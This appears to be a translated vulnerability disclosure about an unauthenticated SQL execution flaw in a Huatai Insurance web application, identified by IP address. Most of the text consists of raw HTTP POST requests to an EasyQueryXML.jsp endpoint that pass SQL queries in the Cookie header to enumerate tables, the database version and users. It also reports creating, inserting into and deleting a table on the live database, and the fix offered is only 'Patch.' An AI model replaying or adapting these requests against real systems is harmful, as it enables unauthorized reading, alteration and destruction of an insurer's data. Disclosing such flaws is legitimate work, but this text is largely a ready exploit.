A System Defect in huatai insurance allows you to directly operate on the database to add, delete, and modify data (you do not need to log on to execute any SQL statement)
Design defects
Http: // 219.143.162.218/htwx/
POST http://219.143.162.218/htwx/common/easyQueryVer3/EasyQueryXML.jsp HTTP/1.1Accept: */*Accept-Language: zh-cnReferer: http://219.143.162.218/htwx/Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)Host: 219.143.162.218Content-Length: 43Connection: Keep-AlivePragma: no-cacheCookie: select TABLE_NAME,NUM_ROWS from tabs &1&0&0
POST http://219.143.162.218/htwx/common/easyQueryVer3/EasyQueryXML.jsp HTTP/1.1Accept: */*Accept-Language: zh-cnReferer: http://219.143.162.218/Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)Host: 219.143.162.218Content-Length: 30Connection: Keep-AlivePragma: no-cacheCookie: select * from v$version &1&0&0
POST http://219.143.162.218/htwx/common/easyQueryVer3/EasyQueryXML.jsp HTTP/1.1Accept: */*Accept-Language: zh-cnReferer: http://219.143.162.218/Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)Host: 219.143.162.218Content-Length: 30Connection: Keep-AlivePragma: no-cacheCookie: select * from all_users &1&0&0
Current Library weixin
1104 tables
You can directly add, delete, and modify tables.
Add Table wpp
The total number of tables is one more than 1105.
Insert
Query
Last deleted
Table deleted
Databases can be operated at will, causing great harm.
Solution:
Patch.